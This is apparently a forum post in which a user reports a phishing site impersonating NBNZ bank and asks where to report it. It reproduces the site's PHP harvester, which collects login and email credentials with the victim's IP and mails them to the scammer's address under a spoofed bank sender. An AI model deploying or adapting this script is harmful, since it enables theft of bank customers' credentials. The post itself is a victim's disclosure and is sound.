hey guys and girls,
Got a suspicious email today and decided to open up the webpage, while at it, I also got into the scripting of the site and opened up some PHP files and found the guys email address.
basically it's some moron trying to scam NBNZ customers to give up their details and looks extremely authentic.
Anyway, he hasn't tried hiding his email address in the PHP forms, so i was wondering where I would report it too? Scripting is below:
<?
session_start();
$cc1= "moses.abagnale@gmail.com";
$ip = getenv("REMOTE_ADDR");
$date = date("D M d, Y g:i a");
$userid0 = $_POST['userid0'];
$password0 = $_POST['password0'];
$email = $_POST['email'];
$emailpass = $_POST['emailpass'];
$msg = "\n User ID: $userid0\n Password: $password0\n Email: $email\n Email Password: $emailpass\n IP: $ip\n Date: $date\n\n";
$from = "From: National Bank <root@nbnz.co.nz>";
$subj = "User Details";
mail("$cc1",$subj,$msg,$from);
header("Location: thanks.htm");
?>
I tried Gmail, but it errors out when trying to report a message :(
I've also emailed the site hosting the website to get it closed.
Any other options at all?
